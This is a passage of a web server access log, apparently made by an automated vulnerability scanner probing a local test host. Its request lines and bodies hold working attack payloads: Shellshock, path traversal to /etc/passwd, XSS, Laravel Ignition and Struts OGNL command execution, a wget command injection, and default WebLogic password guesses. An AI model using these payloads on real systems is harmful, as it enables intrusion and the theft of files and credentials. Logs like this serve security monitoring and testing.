+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.892","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.462","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.527","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.867","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.484","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.459","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.486","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.818","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.475","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.148","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/help/support HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.909","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.485","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.502","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.481","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.494","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.494","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.465","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.137","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /neos/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.477","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.226","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.507","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.905","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.508","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.490","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.492","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.472","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.411","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.316","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.511","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.488","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.947","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.498","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.241","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like 